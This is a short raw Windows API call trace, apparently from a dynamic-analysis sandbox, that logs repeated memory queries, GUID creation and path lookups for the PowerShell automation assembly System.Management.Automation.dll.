	[0101.629] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.629] VirtualQuery (in: lpAddress=0xeb960, lpBuffer=0xec820, dwLength=0x30 | out: lpBuffer=0xec820*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.629] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.629] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.630] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.630] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.630] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xa912a345, Data2=0x1a81, Data3=0x422f, Data4=([0]=0xa8, [1]=0x71, [2]=0xeb, [3]=0x38, [4]=0xd7, [5]=0xfb, [6]=0x90, [7]=0xe))) returned 0x0
	[0101.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.631] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xcb455254, Data2=0x206, Data3=0x4fef, Data4=([0]=0xa7, [1]=0xaa, [2]=0xb7, [3]=0x49, [4]=0x7a, [5]=0xc7, [6]=0x7, [7]=0xdd))) returned 0x0
	[0101.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.635] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.635] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.636] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.636] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.636] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.637] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.638] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.638] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.639] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.640] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.640] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.641] VirtualQuery (in: lpAddress=0xeb390, lpBuffer=0xec250, dwLength=0x30 | out: lpBuffer=0xec250*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.641] VirtualQuery (in: lpAddress=0xeb420, lpBuffer=0xec2e0, dwLength=0x30 | out: lpBuffer=0xec2e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
